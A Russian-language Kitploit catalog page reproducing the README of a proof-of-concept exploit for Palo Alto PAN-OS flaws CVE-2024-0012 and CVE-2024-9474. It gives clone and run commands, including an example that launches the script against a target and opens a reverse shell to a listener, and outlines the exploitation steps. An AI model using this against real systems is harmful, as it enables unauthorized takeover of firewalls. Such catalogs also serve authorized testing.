Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-0012_CVE-2024-9474_PoC — Этот PoC нацелен на уязвимости в Palo Alto PAN-OS, в частности CVE-2024-0012 и CVE-2024-9474. Этот скрипт автоматизирует процесс эксплуатации, включая создание полезной нагрузки, фрагментированную доставку и бесшовное выполнение команд. | Kitploit
Инструменты/GitHubGitHub/talatumlabs/cve-2024-0012_cve-2024-9474_poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubtalatumlabs/cve-2024-0012_cve-2024-9474_poc

CVE-2024-0012_CVE-2024-9474_PoC

Этот PoC нацелен на уязвимости в Palo Alto PAN-OS, в частности CVE-2024-0012 и CVE-2024-9474. Этот скрипт автоматизирует процесс эксплуатации, включая создание полезной нагрузки, фрагментированную доставку и бесшовное выполнение команд.

Репозиторий
8521 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚀 Эксплойт CVE-2024-0012 и CVE-2024-9474 (Palo Alto PAN-OS) 🔐

Palo Alto PAN-OS Exploit Type

🛡️ Описание

Этот скрипт Proof-of-Concept (PoC) направлен на эксплуатацию уязвимостей в Palo Alto PAN-OS, а именно CVE-2024-0012 и CVE-2024-9474, автоматизируя процесс эксплуатации, включая обход аутентификации, создание полезной нагрузки, чанковую доставку и выполнение команд.

⚠️ Этот скрипт предназначен только для образовательных целей и авторизованного тестирования на проникновение. Несанкционированное использование незаконно.


🔍 Рассматриваемые уязвимости

CVE-2024-0012

  • Тип: Обход аутентификации
  • Воздействие: Позволяет несанкционированный доступ к административным интерфейсам.
  • Серьёзность: 🚨 Критическая

CVE-2024-9474

  • Тип: Выполнение команд и повышение привилегий
  • Воздействие: Позволяет удалённым злоумышленникам выполнять произвольные команды.
  • Серьёзность: 🔥 Средняя

🧑‍💻 Использование

🛠️ Клонирование репозитория

root@kitploit:~
git clone https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC.git
cd CVE-2024-0012_CVE-2024-9474_PoC

🚀 Запуск скрипта

root@kitploit:~
python -W ignore poc.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>

Аргументы:

  • <TARGET_URL>: Целевой URL, включая http или https.
  • <LISTENER_IP>: Ваш IP-адрес для слушателя обратной оболочки.
  • <LISTENER_PORT>: Порт для слушателя обратной оболочки.

💡 Пример

root@kitploit:~
python -W ignore poc.py https://target.pan-os-system.com 192.168.1.100 4444

💻 Демонстрация эксплойта

https://github.com/user-attachments/assets/12ca7632-e5d2-488f-b644-6e278651a2f5


⚙️ Как это работает

Получите полный разбор и технические детали этого PoC из этой статьи на Medium!

  1. 🔍 Проверка уязвимости: Убеждается, что цель уязвима к CVE-2024-0012 и CVE-2024-9474.
  2. 🛡️ Извлечение PHPSESSID: Получает идентификатор сессии для дальнейшей эксплуатации.
  3. ✨ Генерация полезной нагрузки: Создаёт дважды закодированную полезную нагрузку обратной оболочки.
  4. 📦 Загрузка чанков: Отправляет части полезной нагрузки на целевой сервер.
  5. 🔗 Объединение полезной нагрузки: Восстанавливает полезную нагрузку на целевой системе.
  6. ⚡ Выполнение команды: Декодирует и выполняет обратную оболочку.

⚠️ Правовое предупреждение

Этот PoC предназначен только для образовательных целей и авторизованного тестирования безопасности. Несанкционированное использование этого инструмента строго запрещено. Авторы не несут ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.


🧑‍🎓 Автор

ghostxploiter

Скачать инструмент